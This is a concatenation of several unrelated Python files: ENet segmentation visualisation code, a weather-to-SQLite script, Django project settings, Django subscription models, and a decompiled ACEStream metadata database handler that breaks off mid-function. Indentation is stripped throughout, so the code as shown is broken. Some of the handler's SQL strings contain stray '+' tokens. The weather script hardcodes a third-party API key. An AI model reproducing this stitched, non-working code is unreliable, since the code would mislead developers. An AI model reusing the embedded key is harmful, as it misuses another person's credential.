plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(imname, bbox_inches='tight', pad_inches=0)
plt.clf()
plt.close('all')
plt.cla()
def visualise_predictions_video(self, on_click=True):
x_batch, y_batch = self.images, self.labels
no_images = x_batch.shape[0]
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
for i in range(no_images):
y = onehot_to_mask(y_batch[i])
x = x_batch[i]
pred = self.predictions[i]
fig = plt.figure(1)
ax = plt.subplot(311)
ax.set_title("Original image")
ax.imshow(x)
ax.axis('off')
ax = plt.subplot(312)
ax.set_title("Ground truth")
ax.imshow(y, cmap=cmap, norm=norm)
ax.axis('off')
ax = plt.subplot(313)
ax.set_title("ENet predictions")
ax.imshow(pred, cmap=cmap, norm=norm)
ax.axis('off')
main_title = "Image {0} of {1} in dataset {2} split {3}".format(i,
no_images,
self.experiment.eval_data,
self.experiment.eval_type)
plt.suptitle(main_title)
self.make_legend(label_colors,
self.label_names)
if on_click:
plt.waitforbuttonpress()
plt.draw()
else:
plt.pause(2)
plt.draw()
def visualise_heatmaps(self, class_idx=2):
preds = self.heat_img
imgs = self.images[self.static_images_idx]
lbl = onehot_to_mask(self.labels[self.static_images_idx])
fig = plt.figure(1)
ax = plt.subplot(311)
ax.set_title("Original image")
ax.imshow(imgs[0])
ax.axis('off')
ax = plt.subplot(312)
ax.set_title("Heatmap rails")
ax.imshow(preds[0, :, :, class_idx])
ax.axis('off')
ax = plt.subplot(313)
ax.set_title("Ground truth")
ax.imshow(lbl[0])
ax.axis('off')
plt.show(block=False)
def write_table(self, pd, name, index):
path = os.path.dirname(self.experiment.experiment_name)
with open(path + "/tables/" + name, "w") as text_file:
text_file.write(pd.to_latex(index=index))
def _get_label_colors(self):
if self.experiment.dataset == "camvid":
Sky = [44, 44, 44]
Building = [128, 0, 0]
Pole = [192, 192, 128]
Road = [128, 64, 128]
Pavement = [60, 40, 222]
Tree = [128, 128, 0]
SignSymbol = [192, 128, 128]
Fence = [64, 64, 128]
Car = [64, 0, 128]
Pedestrian = [64, 64, 0]
Bicyclist = [0, 128, 192]
Unlabelled = [0, 0, 0]
label_colours = np.array([Sky, Building, Pole, Road, Pavement,
Tree, SignSymbol, Fence, Car, Pedestrian,
Bicyclist, Unlabelled])
elif self.experiment.dataset == "vrinno":
Unlabelled = [0, 0, 0]
Pedestrian = [64, 64, 0]
Car = [64, 0, 128]
Rail = [255, 0, 0]
label_colours = np.array([Unlabelled, Pedestrian, Car, Rail])
return label_colours
def normalize(self, x):
mean = np.load("tmp/" + self.experiment.eval_data + "_train_mean.npy")
std = np.load("tmp/" + self.experiment.eval_data + "_train_std.npy")
broadcast_shape = [1, 1, 1]
broadcast_shape[3 - 1] = x.shape[3]
mean = np.reshape(mean, broadcast_shape)
x -= mean
broadcast_shape = [1, 1, 1]
broadcast_shape[3 - 1] = x.shape[3]
std = np.reshape(std, broadcast_shape)
x /= (std + K.epsilon())
return x
@staticmethod
def make_legend(colors, label_names):
patches = []
for col, label_name in zip(colors, label_names):
patch = mpatches.Patch(
edgecolor='black',
linewidth=0.5,
label=label_name,
facecolor=col)
patches.append(patch)
plt.legend(handles=patches,
loc='center right',
fontsize=8,
bbox_to_anchor=(0, -0.1, 1, 1),
bbox_transform=plt.gcf().transFigure)
def get_generator(self, batch_size):
gen = CAMVIDImageDataGenerator(data_split=self.experiment.eval_type,
val_mode=True)
dat = gen.flow_from_directory("data/" + self.experiment.eval_data,
dataset=self.experiment.eval_data,
batch_size=batch_size,
target_size_mask=(360, 480),
keep_classes=self.experiment.keep_classes)
return dat
class EvaluateGenerator():
def __init__(self, gen):
self.nb_batches = 0
self.generator = gen
def visualise(self, no_images=5):
for i in range(no_images):
current_batch = self.generator.next()
im = current_batch[0][i]
msk = onehot_to_mask(current_batch[1][i])
plt.figure(1)
plt.subplot(121)
plt.imshow(im)
plt.title("Image")
plt.subplot(122)
plt.imshow(msk)
plt.show(block=False)
plt.title("Mask")
plt.waitforbuttonpress()
if __name__ == "__main__":
import DataGenerators
gen = DataGenerators.CAMVIDImageDataGenerator()
cm = gen.flow_from_directory("data/camvid/")
ee = EvaluateGenerator(cm)
ee.visualise()
|
import sqlite3
from datetime import datetime
import os.path
import pyowm
from .collect_weather import get_weather_humidity
from .collect_weather import get_weather_temperature
from .collect_weather import get_weather_wind_direction
from .collect_weather import get_weather_wind_speed
from .collect_weather import GetWeather
# openweathermap API key
# please use your own API key!
owm = pyowm.OWM('3ede2418f1124401efcd68e5ae3bddcb')
# Town
town = "Norilsk"
area = 'ru'
norilsk = GetWeather(town, area, '3ede2418f1124401efcd68e5ae3bddcb')
print(norilsk.wind_direction())
# print(GetWeather(town, '3ede2418f1124401efcd68e5ae3bddcb').wind_direction())
observation = owm.weather_at_place('{0},ru'.format(town))
w = observation.get_weather()
def local_time():
    # Current date and time
time = datetime.now().replace(microsecond=0)
return time
#############################################################################
# Test data
db_file_name = "weather.db"
date_time = local_time()
temperature = get_weather_temperature()
humidity = get_weather_humidity()
wind = "{0} m/s".format(get_weather_wind_speed())
wind_direction = get_weather_wind_direction()
#############################################################################
def create_db(db_file_name_local):
    # Weather data database
db_connection = sqlite3.connect(db_file_name_local)
db_conn_cursor = db_connection.cursor()
db_conn_cursor.execute('''CREATE TABLE weather
(id INTEGER PRIMARY KEY, town TEXT, dtime TEXT, t_value TEXT, h_value INTEGER, w_value TEXT, w_dir TEXT)''')
db_connection.commit()
db_connection.close()
print("File created")
def open_and_write_db(db_file_name_local):
    # Weather data database
db_connection = sqlite3.connect(db_file_name_local)
db_conn_cursor = db_connection.cursor()
db_conn_cursor.execute('''INSERT INTO weather(town, dtime, t_value, h_value, w_value, w_dir)
VALUES(?,?,?,?,?,?)''', (town, date_time, temperature, humidity, wind, wind_direction))
# Save (commit) the changes
db_connection.commit()
for row in db_conn_cursor.execute('SELECT * FROM weather ORDER BY id'):
print(row)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
db_connection.close()
if not (os.path.isfile(db_file_name)):
create_db(db_file_name)
open_and_write_db(db_file_name)
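def read_db(db_file_name_local):
    # A minimal read-back sketch (not called by default): print all stored weather
    # rows, newest first. Assumes the table layout created by create_db() above.
    db_connection = sqlite3.connect(db_file_name_local)
    db_conn_cursor = db_connection.cursor()
    for row in db_conn_cursor.execute('SELECT * FROM weather ORDER BY dtime DESC'):
        print(row)
    db_connection.close()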
|
"""
Django settings for imagersite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("SECRET_KEY", "")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get("DEBUG", "True") == "True"
ALLOWED_HOSTS = [os.environ.get("ALLOWED_HOSTS", ""), 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'imager_images',
'imager_profile',
'imagersite',
'sorl.thumbnail',
'taggit',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'imagersite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'imagersite.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get("NAME"),
'USER': os.environ.get("USERNAME"),
'PASSWORD': os.environ.get("DB_PASSWORD"),
'HOST': os.environ.get("HOST"),
'PORT': '5432',
'TEST': {
'NAME': 'django_imager_test'
}
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'MEDIA')
MEDIA_URL = "/media/"
LOGIN_REDIRECT_URL = '/'
ACCOUNT_ACTIVATION_DAYS = 7
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = '[email protected]'
EMAIL_HOST_PASSWORD = os.environ.get('EM_PASS', '')
SERVER_EMAIL = '[email protected]'
DEFAULT_FROM_EMAIL = "Imager Site"
|
from dateutil.relativedelta import relativedelta
from django.conf import settings
from django.db import models
from django.utils import timezone
from enum import Enum
from karrot.base.base_models import BaseModel
class ChannelSubscriptionQuerySet(models.QuerySet):
def old(self):
return self.filter(lastseen_at__lt=timezone.now() - relativedelta(minutes=5))
def recent(self):
return self.filter(lastseen_at__gt=timezone.now() - relativedelta(seconds=20))
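# Usage sketch (not part of the original code):
#   ChannelSubscription.objects.recent()  -> subscriptions seen within the last 20 seconds
#   ChannelSubscription.objects.old()     -> subscriptions last seen more than 5 minutes ago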
class ChannelSubscription(BaseModel):
"""A subscription to receive messages over a django channel."""
objects = ChannelSubscriptionQuerySet.as_manager()
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
reply_channel = models.TextField() # django channels channel
lastseen_at = models.DateTimeField(default=timezone.now, null=True)
away_at = models.DateTimeField(null=True)
class PushSubscriptionPlatform(Enum):
ANDROID = 'android'
WEB = 'web'
class PushSubscription(BaseModel):
"""A subscription to receive messages over an FCM push channel."""
class Meta:
unique_together = ('user', 'token')
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
token = models.TextField() # FCM device registration token
platform = models.CharField(
default=PushSubscriptionPlatform.ANDROID.value,
choices=[(platform.value, platform.value) for platform in PushSubscriptionPlatform],
max_length=100,
)
|
#Embedded file name: ACEStream\Core\CacheDB\MetadataDBHandler.pyo
from ACEStream.Core.Subtitles.MetadataDomainObjects.SubtitleInfo import SubtitleInfo
from ACEStream.Core.Subtitles.MetadataDomainObjects.MetadataDTO import MetadataDTO
from ACEStream.Core.CacheDB.SqliteCacheDBHandler import BasicDBHandler
import threading
from ACEStream.Core.CacheDB.sqlitecachedb import SQLiteCacheDB
import sys
from ACEStream.Core.Subtitles.MetadataDomainObjects.MetadataExceptions import SignatureException, MetadataDBException
from ACEStream.Core.Utilities.utilities import bin2str, str2bin
import sqlite3
import time
SUBTITLE_LANGUAGE_CODE = 'lang'
SUBTITLE_PATH = 'path'
METADATA_TABLE = 'Metadata'
MD_ID_KEY = 'metadata_id'
MD_PUBLISHER_KEY = 'publisher_id'
MD_INFOHASH_KEY = 'infohash'
MD_DESCRIPTION_KEY = 'description'
MD_TIMESTAMP_KEY = 'timestamp'
MD_SIGNATURE_KEY = 'signature'
SUBTITLES_TABLE = 'Subtitles'
SUB_MD_FK_KEY = 'metadata_id_fk'
SUB_LANG_KEY = 'subtitle_lang'
SUB_LOCATION_KEY = 'subtitle_location'
SUB_CHECKSUM_KEY = 'checksum'
SUBTITLES_HAVE_TABLE = 'SubtitlesHave'
SH_MD_FK_KEY = 'metadata_id_fk'
SH_PEER_ID_KEY = 'peer_id'
SH_HAVE_MASK_KEY = 'have_mask'
SH_TIMESTAMP = 'received_ts'
SH_RESULTS_LIMIT = 200
DEBUG = False
SELECT_SUBS_JOIN_BASE = 'SELECT sub.' + SUB_MD_FK_KEY + ', sub.' + SUB_LANG_KEY + ', sub.' + SUB_LOCATION_KEY + ', sub.' + SUB_CHECKSUM_KEY + ' FROM ' + METADATA_TABLE + ' AS md ' + 'INNER JOIN ' + SUBTITLES_TABLE + ' AS sub ' + 'ON md.' + MD_ID_KEY + ' = sub.' + SUB_MD_FK_KEY
MD_SH_JOIN_CLAUSE = METADATA_TABLE + ' AS md ' + 'INNER JOIN ' + SUBTITLES_HAVE_TABLE + ' AS sh ' + 'ON md.' + MD_ID_KEY + ' = sh.' + SH_MD_FK_KEY
QUERIES = {'SELECT SUBS JOIN HASH ALL': SELECT_SUBS_JOIN_BASE + ' WHERE md.' + MD_INFOHASH_KEY + ' = ?' + ' AND md.' + MD_PUBLISHER_KEY + ' = ?;',
'SELECT SUBS JOIN HASH ONE': SELECT_SUBS_JOIN_BASE + ' WHERE md.' + MD_INFOHASH_KEY + ' = ?' + ' AND md.' + MD_PUBLISHER_KEY + ' = ?' + ' AND sub.' + SUB_LANG_KEY + ' = ?;',
'SELECT SUBS FK ALL': 'SELECT * FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + ' = ?;',
'SELECT SUBS FK ONE': 'SELECT * FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + ' = ?' + ' AND ' + SUB_LANG_KEY + ' = ?;',
'SELECT METADATA': 'SELECT * FROM ' + METADATA_TABLE + ' WHERE ' + MD_INFOHASH_KEY + ' = ?' + ' AND ' + MD_PUBLISHER_KEY + ' = ?;',
'SELECT NRMETADATA': 'SELECT COUNT(*) FROM ' + METADATA_TABLE + ' WHERE ' + MD_PUBLISHER_KEY + ' = ?;',
'SELECT PUBLISHERS FROM INFOHASH': 'SELECT ' + MD_PUBLISHER_KEY + ' FROM ' + METADATA_TABLE + ' WHERE ' + MD_INFOHASH_KEY + ' = ?;',
'UPDATE METADATA': 'UPDATE ' + METADATA_TABLE + ' SET ' + MD_DESCRIPTION_KEY + ' = ?, ' + MD_TIMESTAMP_KEY + ' = ?, ' + MD_SIGNATURE_KEY + ' = ?' + ' WHERE ' + MD_INFOHASH_KEY + ' = ?' + ' AND ' + MD_PUBLISHER_KEY + ' = ?;',
'UPDATE SUBTITLES': 'UPDATE ' + SUBTITLES_TABLE + ' SET ' + SUB_LOCATION_KEY + '= ?, ' + SUB_CHECKSUM_KEY + '= ?' + ' WHERE ' + SUB_MD_FK_KEY + '= ?' + ' AND ' + SUB_LANG_KEY + '= ?;',
'DELETE ONE SUBTITLES': 'DELETE FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + '= ? ' + ' AND ' + SUB_LANG_KEY + '= ?;',
'DELETE ONE SUBTITLE JOIN': 'DELETE FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + ' IN ( SELECT ' + MD_ID_KEY + ' FROM ' + METADATA_TABLE + ' WHERE ' + MD_PUBLISHER_KEY + ' = ?' + ' AND ' + MD_INFOHASH_KEY + ' = ? )' + ' AND ' + SUB_LANG_KEY + '= ?;',
'DELETE ALL SUBTITLES': 'DELETE FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + '= ?;',
'DELETE METADATA PK': 'DELETE FROM ' + METADATA_TABLE + ' WHERE ' + MD_ID_KEY + ' = ?;',
'INSERT METADATA': 'INSERT or IGNORE INTO ' + METADATA_TABLE + ' VALUES ' + '(NULL,?,?,?,?,?)',
'INSERT SUBTITLES': 'INSERT INTO ' + SUBTITLES_TABLE + ' VALUES (?, ?, ?, ?);',
'SELECT SUBTITLES WITH PATH': 'SELECT sub.' + SUB_MD_FK_KEY + ', sub.' + SUB_LOCATION_KEY + ', sub.' + SUB_LANG_KEY + ', sub.' + SUB_CHECKSUM_KEY + ', m.' + MD_PUBLISHER_KEY + ', m.' + MD_INFOHASH_KEY + ' FROM ' + METADATA_TABLE + ' AS m ' + 'INNER JOIN ' + SUBTITLES_TABLE + ' AS sub ' + 'ON m.' + MD_ID_KEY + ' = ' + ' sub.' + SUB_MD_FK_KEY + ' WHERE ' + SUB_LOCATION_KEY + ' IS NOT NULL;',
'SELECT SUBTITLES WITH PATH BY CHN INFO': 'SELECT sub.' + SUB_LOCATION_KEY + ', sub.' + SUB_LANG_KEY + ', sub.' + SUB_CHECKSUM_KEY + ' FROM ' + METADATA_TABLE + ' AS m ' + 'INNER JOIN ' + SUBTITLES_TABLE + ' AS sub ' + 'ON m.' + MD_ID_KEY + ' = ' + ' sub.' + SUB_MD_FK_KEY + ' WHERE sub.' + SUB_LOCATION_KEY + ' IS NOT NULL' + ' AND m.' + MD_PUBLISHER_KEY + ' = ?' + ' AND m.' + MD_INFOHASH_KEY + ' = ?;',
'INSERT HAVE MASK': 'INSERT INTO ' + SUBTITLES_HAVE_TABLE + ' VALUES ' + '(?, ?, ?, ?);',
'GET ALL HAVE MASK': 'SELECT sh.' + SH_PEER_ID_KEY + ', sh.' + SH_HAVE_MASK_KEY + ', sh.' + SH_TIMESTAMP + ' FROM ' + MD_SH_JOIN_CLAUSE + ' WHERE md.' + MD_PUBLISHER_KEY + ' = ? AND md.' + MD_INFOHASH_KEY + ' = ? ' + 'ORDER BY sh.' + SH_TIMESTAMP + ' DESC' + ' LIMIT ' + str(SH_RESULTS_LIMIT) + ';',
'GET ONE HAVE MASK': 'SELECT sh.' + SH_HAVE_MASK_KEY + ', sh.' + SH_TIMESTAMP + ' FROM ' + MD_SH_JOIN_CLAUSE + ' WHERE md.' + MD_PUBLISHER_KEY + ' = ? AND md.' + MD_INFOHASH_KEY + ' = ? AND sh.' + SH_PEER_ID_KEY + ' = ?;',
'UPDATE HAVE MASK': 'UPDATE ' + SUBTITLES_HAVE_TABLE + ' SET ' + SH_HAVE_MASK_KEY + ' = ?, ' + SH_TIMESTAMP + ' = ?' + ' WHERE ' + SH_PEER_ID_KEY + ' = ?' + ' AND ' + SH_MD_FK_KEY + ' IN ' + '( SELECT + ' + MD_ID_KEY + ' FROM ' + METADATA_TABLE + ' WHERE + ' + MD_PUBLISHER_KEY + ' = ?' + ' AND ' + MD_INFOHASH_KEY + ' = ? );',
'DELETE HAVE': 'DELETE FROM ' + SUBTITLES_HAVE_TABLE + ' WHERE ' + SH_PEER_ID_KEY + ' = ?' + ' AND ' + SH_MD_FK_KEY + ' IN ' + '( SELECT + ' + MD_ID_KEY + ' FROM ' + METADATA_TABLE + ' WHERE + ' + MD_PUBLISHER_KEY + ' = ?' + ' AND ' + MD_INFOHASH_KEY + ' = ? );',
'CLEANUP OLD HAVE': 'DELETE FROM ' + SUBTITLES_HAVE_TABLE + ' WHERE ' + SH_TIMESTAMP + ' < ? ' + ' AND ' + SH_PEER_ID_KEY + ' NOT IN ' + '( SELECT md.' + MD_PUBLISHER_KEY + ' FROM ' + METADATA_TABLE + ' AS md WHERE md.' + MD_ID_KEY + ' = ' + SH_MD_FK_KEY + ' );'}
class MetadataDBHandler(object, BasicDBHandler):
__single = None
_lock = threading.RLock()
@staticmethod
def getInstance(*args, **kw):
if MetadataDBHandler.__single is None:
MetadataDBHandler._lock.acquire()
try:
if MetadataDBHandler.__single is None:
MetadataDBHandler(*args, **kw)
finally:
MetadataDBHandler._lock.release()
return MetadataDBHandler.__single
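    # Usage sketch (assumption): the handler is a lazily created singleton, e.g.
    #   handler = MetadataDBHandler.getInstance()
    #   metadata_dto = handler.getMetadata(channel, infohash)
    # where channel and infohash are the binary identifiers used throughout this module.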
def __init__(self, db = SQLiteCacheDB.getInstance()):
try:
MetadataDBHandler._lock.acquire()
MetadataDBHandler.__single = self
finally:
MetadataDBHandler._lock.release()
try:
self._db = db
print >> sys.stderr, 'Metadata: DB made'
except:
print >> sys.stderr, "Metadata: couldn't make the tables"
print >> sys.stderr, 'Metadata DB Handler initialized'
def commit(self):
self._db.commit()
def getAllSubtitles(self, channel, infohash):
query = QUERIES['SELECT SUBS JOIN HASH ALL']
infohash = bin2str(infohash)
channel = bin2str(channel)
results = self._db.fetchall(query, (infohash, channel))
subsDict = {}
for entry in results:
subsDict[entry[1]] = SubtitleInfo(entry[1], entry[2], entry[3])
return subsDict
def _deleteSubtitleByChannel(self, channel, infohash, lang):
query = QUERIES['DELETE ONE SUBTITLE JOIN']
infohash = bin2str(infohash)
channel = bin2str(channel)
self._db.execute_write(query, (channel, infohash, lang))
def _getAllSubtitlesByKey(self, metadataKey):
query = QUERIES['SELECT SUBS FK ALL']
results = self._db.fetchall(query, (metadataKey,))
subsDict = {}
for entry in results:
subsDict[entry[1]] = SubtitleInfo(entry[1], entry[2], str2bin(entry[3]))
return subsDict
def getSubtitle(self, channel, infohash, lang):
query = QUERIES['SELECT SUBS JOIN HASH ONE']
infohash = bin2str(infohash)
channel = bin2str(channel)
res = self._db.fetchall(query, (infohash, channel, lang))
if len(res) == 0:
return None
if len(res) == 1:
checksum = str2bin(res[0][3])
return SubtitleInfo(res[0][1], res[0][2], checksum)
        raise MetadataDBException('Metadata DB Constraint violated!')
def _getSubtitleByKey(self, metadata_fk, lang):
query = QUERIES['SELECT SUBS FK ONE']
res = self._db.fetchall(query, (metadata_fk, lang))
if len(res) == 0:
return None
if len(res) == 1:
checksum = str2bin(res[0][3])
return SubtitleInfo(res[0][1], res[0][2], checksum)
        raise MetadataDBException('Metadata DB Constraint violated!')
def getMetadata(self, channel, infohash):
query = QUERIES['SELECT METADATA']
infohash = bin2str(infohash)
channel = bin2str(channel)
res = self._db.fetchall(query, (infohash, channel))
if len(res) == 0:
return
if len(res) > 1:
raise MetadataDBException('Metadata DB Constraint violated')
metaTuple = res[0]
subsDictionary = self._getAllSubtitlesByKey(metaTuple[0])
publisher = str2bin(metaTuple[1])
infohash = str2bin(metaTuple[2])
timestamp = int(metaTuple[4])
description = unicode(metaTuple[3])
signature = str2bin(metaTuple[5])
toReturn = MetadataDTO(publisher, infohash, timestamp, description, None, signature)
for sub in subsDictionary.itervalues():
toReturn.addSubtitle(sub)
return toReturn
def getNrMetadata(self, channel):
query = QUERIES['SELECT NRMETADATA']
channel = bin2str(channel)
return self._db.fetchone(query, (channel,))
def getAllMetadataForInfohash(self, infohash):
strinfohash = bin2str(infohash)
query = QUERIES['SELECT PUBLISHERS FROM INFOHASH']
channels = self._db.fetchall(query, (strinfohash,))
return [ self.getMetadata(str2bin(entry[0]), infohash) for entry in channels ]
def hasMetadata(self, channel, infohash):
query = QUERIES['SELECT METADATA']
infohash = bin2str(infohash)
channel = bin2str(channel)
res = self._db.fetchall(query, (infohash, channel))
return len(res) != 0
def insertMetadata(self, metadata_dto):
if not metadata_dto.verifySignature():
            raise SignatureException('Metadata to insert is not properly signed')
select_query = QUERIES['SELECT METADATA']
signature = bin2str(metadata_dto.signature)
infohash = bin2str(metadata_dto.infohash)
channel = bin2str(metadata_dto.channel)
res = self._db.fetchall(select_query, (infohash, channel))
isUpdate = False
if len(res) != 0:
if metadata_dto.timestamp > res[0][4]:
query = QUERIES['UPDATE METADATA']
self._db.execute_write(query, (metadata_dto.description,
metadata_dto.timestamp,
signature,
infohash,
channel), False)
fk_key = res[0][0]
isUpdate = True
else:
return
else:
query = QUERIES['INSERT METADATA']
self._db.execute_write(query, (channel,
infohash,
metadata_dto.description,
metadata_dto.timestamp,
signature), True)
if DEBUG:
print >> sys.stderr, 'Performing query on db: ' + query
newRows = self._db.fetchall(select_query, (infohash, channel))
if len(newRows) == 0:
raise IOError('No results, while there should be one')
fk_key = newRows[0][0]
self._insertOrUpdateSubtitles(fk_key, metadata_dto.getAllSubtitles(), False)
self._db.commit()
return isUpdate
def _insertOrUpdateSubtitles(self, fk_key, subtitles, commitNow = True):
allSubtitles = self._getAllSubtitlesByKey(fk_key)
oldSubsSet = frozenset(allSubtitles.keys())
newSubsSet = frozenset(subtitles.keys())
commonLangs = oldSubsSet & newSubsSet
newLangs = newSubsSet - oldSubsSet
toDelete = oldSubsSet - newSubsSet
for lang in commonLangs:
self._updateSubtitle(fk_key, subtitles[lang], False)
for lang in toDelete:
self._deleteSubtitle(fk_key, lang, False)
for lang in newLangs:
self._insertNewSubtitle(fk_key, subtitles[lang], False)
if commitNow:
self._db.commit()
def _updateSubtitle(self, metadata_fk, subtitle, commitNow = True):
toUpdate = self._getSubtitleByKey(metadata_fk, subtitle.lang)
if toUpdate is None:
return
query = QUERIES['UPDATE SUBTITLES']
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (subtitle.path,
checksum,
metadata_fk,
subtitle.lang), commitNow)
def updateSubtitlePath(self, channel, infohash, lang, newPath, commitNow = True):
query = QUERIES['SELECT SUBS JOIN HASH ONE']
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (infohash, channel, lang))
if len(res) > 1:
raise MetadataDBException('Metadata DB constraint violated')
else:
if len(res) == 0:
if DEBUG:
print >> sys.stderr, 'Nothing to update for channel %s, infohash %s, lang %s. Doing nothing.' % (channel[-10:], infohash, lang)
return False
query = QUERIES['UPDATE SUBTITLES']
self._db.execute_write(query, (newPath,
res[0][3],
res[0][0],
lang), commitNow)
return True
def _deleteSubtitle(self, metadata_fk, lang, commitNow = True):
query = QUERIES['DELETE ONE SUBTITLES']
self._db.execute_write(query, (metadata_fk, lang), commitNow)
def _insertNewSubtitle(self, metadata_fk, subtitle, commitNow = True):
query = QUERIES['INSERT SUBTITLES']
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (metadata_fk,
subtitle.lang,
subtitle.path,
checksum), commitNow)
def deleteMetadata(self, channel, infohash):
channel = bin2str(channel)
infohash = bin2str(infohash)
query = QUERIES['SELECT METADATA']
if DEBUG:
print >> sys.stderr, 'Performing query on db: ' + query
res = self._db.fetchall(query, (infohash, channel))
if len(res) == 0:
return
if len(res) > 1:
raise IOError('Metadata DB constraint violated')
metadata_fk = res[0][0]
self._deleteAllSubtitles(metadata_fk, False)
query = QUERIES['DELETE METADATA PK']
self._db.execute_write(query, (metadata_fk,), False)
self._db.commit()
def _deleteAllSubtitles(self, metadata_fk, commitNow):
query = QUERIES['DELETE ALL SUBTITLES']
self._db.execute_write(query, (metadata_fk,), commitNow)
def getAllLocalSubtitles(self):
query = QUERIES['SELECT SUBTITLES WITH PATH']
res = self._db.fetchall(query)
result = {}
for entry in res:
path = entry[1]
lang = entry[2]
checksum = str2bin(entry[3])
channel = str2bin(entry[4])
infohash = str2bin(entry[5])
s = SubtitleInfo(lang, path, checksum)
if channel not in result:
result[channel] = {}
if infohash not in result[channel]:
result[channel][infohash] = []
result[channel][infohash].append(s)
return result
def getLocalSubtitles(self, channel, infohash):
query = QUERIES['SELECT SUBTITLES WITH PATH BY CHN INFO']
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (channel, infohash))
result = {}
for entry in res:
location = entry[0]
language = entry[1]
checksum = str2bin(entry[2])
subInfo = SubtitleInfo(language, location, checksum)
result[language] = subInfo
return result
def insertHaveMask(self, channel, infohash, peer_id, havemask, timestamp = None):
query = QUERIES['SELECT METADATA']
if timestamp is None:
timestamp = int(time.time())
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
res = self._db.fetchall(query, (infohash, channel))
if len(res) != 1:
raise MetadataDBException('No entry in the MetadataDB for %s, %s' % (channel[-10:], infohash))
metadata_fk = res[0][0]
insertQuery = QUERIES['INSERT HAVE MASK']
try:
self._db.execute_write(insertQuery, (metadata_fk,
peer_id,
havemask,
timestamp))
except sqlite3.IntegrityError as e:
raise MetadataDBException(str(e))
def updateHaveMask(self, channel, infohash, peer_id, newMask, timestamp = None):
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
updateQuery = QUERIES['UPDATE HAVE MASK']
if timestamp is None:
timestamp = int(time.time())
self._db.execute_write(updateQuery, (newMask,
timestamp,
peer_id,
channel,
infohash))
def deleteHaveEntry(self, channel, infohash, peer_id):
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
deleteQuery = QUERIES['DELETE HAVE']
self._db.execute_write(deleteQuery, (peer_id, channel, infohash))
def getHaveMask(self, channel, infohash, peer_id):
query = QUERIES['GET ONE HAVE MASK']
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
res = self._db.fetchall(query, (channel, infohash, peer_id))
if len(res) <= 0:
return None
if len(res) > 1:
raise AssertionError('channel,infohash,peer_id should be unique')
else:
return res[0][0]
def getHaveEntries(self, channel, infohash):
query = QUERIES['GET ALL HAVE MASK']
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (channel, infohash))
returnlist = list()
for entry in res:
peer_id = str2bin(entry[0])
haveMask = entry[1]
timestamp = entry[2]
returnlist.append((peer_id, haveMask, timestamp))
return returnlist
def cleanupOldHave(self, limit_ts):
